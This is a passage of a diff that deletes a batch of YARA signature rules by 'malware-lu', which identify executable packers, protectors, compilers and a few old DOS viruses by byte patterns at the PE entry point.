-		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidiumv1300ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }
-	$a1 = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B 50 EB 03 8A 0B 93 33 C0 EB 02 28 B9 8B 00 EB 01 04 C3 EB 04 65 B3 54 0A E9 FA 00 00 00 EB 01 A2 E8 D5 FF FF FF EB 02 2B 49 EB 03 7C 3E 76 58 EB 04 B8 94 92 56 EB 01 72 64 67 8F 06 00 00 EB 02 23 72 83 C4 04 EB 02 A9 CB E8 47 26 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Feokt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 89 25 A8 11 40 00 BF ?? ?? ?? 00 31 C0 B9 ?? ?? ?? 00 29 F9 FC F3 AA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NTkrnlSecureSuite01015NTkrnlSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule PEPROTECT09
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 CF 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXERefactorV01random
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 90 0B 00 00 53 56 57 E9 58 8C 01 00 55 53 43 41 54 49 4F 4E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrunchPEv40
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 E9 06 ?? ?? 89 85 E1 06 ?? ?? FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 }
-
-condition:
-		$a0
-}
-	
-	
-rule NullsoftPIMPInstallSystemv1x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 5C 53 55 56 57 FF 15 ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Pohernah100byKas
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 58 60 E8 00 00 00 00 5D 81 ED 20 25 40 00 8B BD 86 25 40 00 8B 8D 8E 25 40 00 6B C0 05 83 F0 04 89 85 92 25 40 00 83 F9 00 74 2D 81 7F 1C AB 00 00 00 75 1E 8B 77 0C 03 B5 8A 25 40 00 31 C0 3B 47 10 74 0E 50 8B 85 92 25 40 00 30 06 58 40 46 EB ED 83 C7 28 49 EB CE 8B 85 82 25 40 00 89 44 24 1C 61 FF E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule dUP2diablo2oo2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 3C 01 75 19 BE ?? ?? ?? ?? 68 00 02 00 00 56 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01ASPack2xxHeuristicAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXpressorv145CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule hmimysProtectv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 }
-	$a1 = { E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule VProtectorV10Evcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 0A 5B 56 50 72 6F 74 65 63 74 5D E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01LCCWin32DLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 ?? ?? ?? ?? E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CodeCryptv014b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 C5 02 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC450DLLX86CRTLIB
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 85 DB 75 0D 83 3D ?? ?? ?? ?? 00 75 04 31 C0 EB 57 83 FB 01 74 05 83 FB 02 75 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EEXEVersion112
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 30 CD 21 3C 03 73 ?? BA 1F 00 0E 1F B4 09 CD 21 B8 FF 4C CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv120EngdulekxtMASM32TASM32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEDiminisherv01Teraphy
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 50 E8 02 01 00 00 8B FD 8D 9D 9A 33 40 00 8B 1B 8D 87 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02VBOX43MTEAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SEAAXE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC BC ?? ?? 0E 1F E8 ?? ?? 26 A1 ?? ?? 8B 1E ?? ?? 2B C3 8E C0 B1 ?? D3 E3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UpackV010V011Dwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? ?? AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 ?? F3 AB C1 E0 ?? B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C ?? 73 ?? B0 ?? 3C ?? 72 02 2C ?? 50 0F B6 5F FF C1 E3 ?? B3 ?? 8D 1C 5B 8D ?? ?? ?? ?? ?? ?? B0 ?? 67 E3 29 8B D7 2B 56 0C 8A 2A 33 D2 84 E9 0F 95 C6 52 FE C6 8A D0 8D 14 93 FF D5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakePCGuard403415FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePack111Method1bagieTMX
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC }
-	$a1 = { 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC F3 A5 89 C1 83 E1 03 F3 A4 5F 5E 8B 04 24 89 EA 03 57 0C E8 3F 01 00 00 58 68 00 40 00 00 FF 77 10 50 FF 93 3C 03 00 00 83 C7 28 4E 75 9E BE ?? ?? ?? ?? 09 F6 0F 84 0C 01 00 00 01 EE 8B 4E 0C 09 C9 0F 84 FF 00 00 00 01 E9 89 CF 57 FF 93 30 03 00 00 09 C0 75 3D 6A 04 68 00 10 00 00 68 00 10 00 00 6A 00 FF 93 38 03 00 00 89 C6 8D 83 6F 02 00 00 57 50 56 FF 93 44 03 00 00 6A 10 6A 00 56 6A 00 FF 93 48 03 00 00 89 E5 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule MASM32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A ?? 68 00 30 40 00 68 ?? 30 40 00 6A 00 E8 07 00 00 00 6A 00 E8 06 00 00 00 FF 25 08 20 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftDefenderv10v11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD ?? 59 9C 50 74 0A 75 08 E8 59 C2 04 ?? 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 ?? ?? ?? ?? 58 05 BA 01 ?? ?? 03 C8 74 BE 75 BC E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule XtremeProtectorv106
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? 00 B9 75 ?? ?? 00 50 51 E8 05 00 00 00 E9 4A 01 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 8A 06 46 88 07 47 BB 02 00 00 00 02 D2 75 05 8A 16 46 12 D2 73 EA 02 D2 75 05 8A 16 46 12 D2 73 4F 33 C0 02 D2 75 05 8A 16 46 12 D2 0F 83 DF 00 00 00 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VcasmProtector1112vcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidiumv1111
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 E7 1C 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxEddie1530
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? 50 06 56 1E 33 C0 50 1F C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule KBySV028DLLshoooo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C2 FF E0 ?? ?? ?? ?? 60 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEncrypt10JunkCode
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C BE 00 10 40 00 8B FE B9 ?? ?? ?? ?? BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 E9 ?? ?? ?? FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEPasswordv02SMTSMF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 ?? ?? ?? 8B EC 5D C3 33 C0 5D 8B FD 81 ED 33 26 40 ?? 81 EF ?? ?? ?? ?? 83 EF 05 89 AD 88 27 40 ?? 8D 9D 07 29 40 ?? 8D B5 62 28 40 ?? 46 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EncryptPE22006710220061025WFS
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RCryptorv16Vaska
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 D0 68 ?? ?? ?? ?? FF D2 }
-	$a1 = { 33 D0 68 ?? ?? ?? ?? FF D2 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PEPaCKv10CCopyright1998byANAKiN
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 2D 3D FE 20 50 45 2D 50 41 43 4B 20 76 31 2E 30 20 2D FE 2D 20 28 43 29 20 43 6F 70 }
-
-condition:
-		$a0
-}
-	
-	
-rule YodasProtectorv1032Beta2AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxMTEnonencrypted
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { F7 D9 80 E1 FE 75 02 49 49 97 A3 ?? ?? 03 C1 24 FE 75 02 48 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01FSG131Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv212AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }
-	$a1 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Upack022023betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 }
-	$a1 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 59 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 }
-	$a2 = { AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 ?? 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 }
-
-condition:
-		$a0 or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01CodeLockAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv100c1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E 8C 1E ?? ?? 8B 1E ?? ?? 8C DA 81 C2 ?? ?? 3B DA 72 ?? 81 EB ?? ?? 83 EB ?? FA 8E D3 BC ?? ?? FB FD BE ?? ?? 8B FE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakenSPack13emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKLITEv100c2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? A1 ?? ?? 2D ?? ?? 8C CB 81 C3 ?? ?? 3B C3 77 ?? 05 ?? ?? 3B C3 77 ?? B4 09 BA ?? ?? CD 21 CD 20 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kkrunchyv017FGiesen
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC FF 4D 08 31 D2 8D 7D 30 BE }
-
-condition:
-		$a0
-}
-	
-	
-rule ACProtectv190gRiscosoftwareInc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 0F 87 02 00 00 00 1B F8 E8 01 00 00 00 73 83 04 24 06 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPX293300LZMAMarkusOberhumerLaszloMolnarJohnReiser
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium133720070623ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv2000AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 70 05 00 00 EB 4C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov4000053SiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 20 8B 4B 00 68 80 E4 48 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4B 00 33 D2 8A D4 89 15 A4 A1 4B 00 8B C8 81 E1 FF 00 00 00 89 0D A0 A1 4B 00 C1 E1 08 03 CA 89 0D 9C A1 4B 00 C1 E8 10 A3 98 A1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov160a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 98 71 40 00 68 48 2D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ACProtectUltraProtect10X20XRiSco
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 6F 72 74 5F 45 6E 64 73 73 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Thinstall3035Jtit
-{
-      meta:
-		author="malware-lu"
-strings:
